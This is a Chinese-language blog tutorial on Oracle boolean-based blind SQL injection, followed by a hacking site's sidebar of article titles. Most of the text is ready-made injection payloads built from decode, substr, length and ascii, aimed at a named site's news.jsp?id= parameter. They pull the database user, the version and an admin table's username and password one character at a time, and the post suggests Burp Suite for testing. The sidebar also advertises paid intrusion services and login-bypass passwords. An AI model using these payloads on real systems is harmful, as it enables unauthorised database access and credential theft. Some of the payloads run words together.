1、在oracle两种利用布尔型实现盲注入方法
l 是否存在注入 根据页面的返回不同 从而判断注入点。
l 出数据 通过注入点 构造的SQL语句 判断页面是否正常。
2、decode 盲注入
decode(字段或字段的运算,值1,值2,值3)
这个函数运行的结果是,当字段或字段的运算的值等于值1时,该函数返回值2,否则返回3
当然值1,值2,值3也可以是表达式,这个函数使得某些sql语句简单了许多
使用方法:
比较大小
select decode(sign(变量1-变量2),-1,变量1,变量2) from dual; --取较小值
sign()函数根据某个值是0、正数还是负数,分别返回0、1、-1
例如:
变量1=10,变量2=20
则sign(变量1-变量2)返回-1,decode解码结果为“变量1”,达到了取较小值的目的。
1+3=4 返回1 不等于返回0
selectdecode(1+3,4,1,0) from dual;
selectdecode(user,'SYSTEM',1,0) from dual;
获取当前用户 (select user from dual)
获取当前版本 (select banner from sys.v_$versionwhere rownum=1)
获取当前admin表的帐号和密码 (selectusername||password from admin)
获取字符长度
select length(user) from dual --
select * from artwhere id=1 and 6=(select length(user) from dual) --
http://www.jsporcle.com/news.jsp?id=1 and 6=(select length(user) from dual) --
当前用户第一个字母的是否等于S 等于返回1否则返回0
(select decode(substr(user,1,1),'S',1,0) from dual) -- (select decode(substr(user,2,1),'Y',1,0) from dual) -- (select decode(substr(user,3,1),'S',1,0) from dual) -- (select decode(substr(user,4,1),'T',1,0) from dual) -- (select decode(substr(user,5,1),'E',1,0) from dual) -- (select decode(substr(user,6,1),'N',1,0) from dual) --
测试当前用户语句
http://www.jsporcle.com/news.jsp?id=1and 1=(select decode(substr(user,1,1),'S',1,0) from dual) --
获取当前admin表的帐号和密码
select * from art where id=1 and 1=(select decode(substr((select username||password fromadmin),1,1),'a',1,0) from dual)
http://www.jsporcle.com/news.jsp?id=1and 1=(select decode(substr((select username%7c%7cpassword fromadmin),1,1),'a',1,0) from dual)
判断字符的字符
abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.
查询第二个的时候
http://www.jsporcle.com/news.jsp?id=1and 1=(select decode(substr((select username%7c%7cpassword from admin),2,1),'d',1,0)from dual) admin
用burpsuite测试盲注入
3、盲注入通用 逐字猜解法
先获取数据长度
37=(select length(username||password)from admin)
转码测试
and 37=(select length(username%7c%7cpassword) from admin)--
select * from artwhere id=1 and 37=(select length(username||password) from admin);
猜解ascii码
and (select ascii(substr(username%7c%7cpassword,1,1)) from admin)=97
猜你还喜欢
- 07-08八年专业安全团队承接渗透入侵维护服务
- 08-06SQLMAP的注入命令以及使用方法
- 08-03白帽故事汇:网络安全战士从来不是「男生」的专利
- 07-27编辑器漏洞手册
- 07-12web安全之如何全面发现系统后台
- 02-22常见Web源码泄露总结
- 07-25网站后台登陆万能密码
- 07-23破解emlog收费模板“Begin”
- 01-12批量检测SQL注入
- 01-22Apache Solr远程代码执行漏洞(CVE-2017-12629)从利用到入侵检测
- 随机文章
-
- 有趣的php反序列化总结
- PrettyPhoto(jQuery插件)的DOM型XSS分析
- 代码审计学习之三个白帽Xor挑战
- 无需登录-悟空CRM 存储型XSS
- php代码审计基础笔记
- php框架slim架构上存在XXE漏洞(XXE的典型存在形式)
- Java RMI服务远程命令执行利用
- PHP代码审计tips
- Python中eval带来的潜在风险
- PHP自动化白盒审计技术与实现
- 篡改install-recovery.sh脚本的流氓插件程序
- 记一次曲折的渗透测试
- 撸掉隔壁工位的新员工引发的血案
- 《安全参考》HACKCTO-201504-28
- 浅谈PHP自动化代码审计技术
- 如何获取安卓iOS上的微信聊天记录、通过Metasploit控制安卓
- Burpsuite之Burp Collaborator模块介绍
- xss其他标签下的js用法总结大全
- 「超级英雄」的规则是什么?
- 进监狱全攻略:Mifare1 Card破解
- 热门文章
-
- 八年专业安全团队承接渗透入侵维护服务
- Emlog黑客站模板“Milw0rm”发布
- Stuxnet纪录片-零日 Zero.Days (2016)【中文字幕】
- SQLMAP的注入命令以及使用方法
- 白帽故事汇:网络安全战士从来不是「男生」的专利
- 编辑器漏洞手册
- web安全之如何全面发现系统后台
- 常见Web源码泄露总结
- 渗透测试培训(第五期)
- 深入理解JAVA反序列化漏洞
- cmseasy前台无需登录直接获取敏感数据的SQL注入(有POC证明)
- 网站后台登陆万能密码
- 黑麒麟2016渗透培训系列教程
- 破解emlog收费模板“Begin”
- 那些强悍的PHP一句话后门
- Android平台渗透测试套件zANTI v2.5发布(含详细说明)
- 渗透工具BackTrack与KaliLinux全套视频教程
- Python列为黑客应该学的四种编程语言之一 初学者该怎么学
- CVE-2017-11882漏洞复现和利用
- 恶意程序报告在线查询工具
文章存档
- 2021年3月(4)
- 2020年12月(4)
- 2020年11月(5)
- 2020年10月(8)
- 2020年9月(8)
- 2020年8月(20)
- 2020年7月(47)
- 2020年6月(70)
- 2020年5月(41)
- 2020年4月(21)
- 2020年3月(120)
- 2020年2月(26)
- 2019年12月(12)
- 2019年11月(13)
- 2019年10月(17)
- 2019年9月(15)
- 2019年8月(13)
- 2019年7月(15)
- 2019年6月(15)
- 2019年5月(19)
- 2019年4月(23)
- 2019年3月(19)
- 2019年2月(11)
- 2019年1月(29)
- 2018年12月(24)
- 2018年11月(56)
- 2018年10月(79)
- 2018年9月(20)
- 2018年8月(17)
- 2018年7月(16)
- 2018年6月(7)
- 2018年5月(10)
- 2018年3月(6)
- 2018年2月(2)
- 2018年1月(11)
- 2017年11月(18)
- 2017年10月(6)
- 2017年9月(8)
- 2017年8月(7)
- 2017年7月(7)
- 2017年6月(15)
- 2017年5月(30)
- 2017年4月(7)
- 2017年3月(1)
- 2017年2月(4)
- 2017年1月(1)
- 2016年12月(3)
- 2016年11月(7)
- 2016年10月(6)
- 2016年9月(6)
- 2016年8月(102)
- 2016年7月(24)
- 2013年7月(1)
- 文章标签
-